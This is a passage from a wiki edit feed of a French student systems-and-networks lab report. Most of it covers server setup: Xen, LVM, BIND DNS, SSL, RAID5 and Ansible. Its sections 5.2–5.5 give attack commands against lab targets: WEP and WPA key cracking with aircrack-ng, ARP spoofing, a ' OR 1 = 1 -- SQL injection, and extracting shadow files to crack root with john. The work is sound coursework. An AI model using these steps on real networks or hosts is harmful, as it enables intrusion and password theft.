Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le réportoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55159</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55159"/>
				<updated>2020-12-22T00:21:26Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* 4.3  Sécurisation de site web par certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
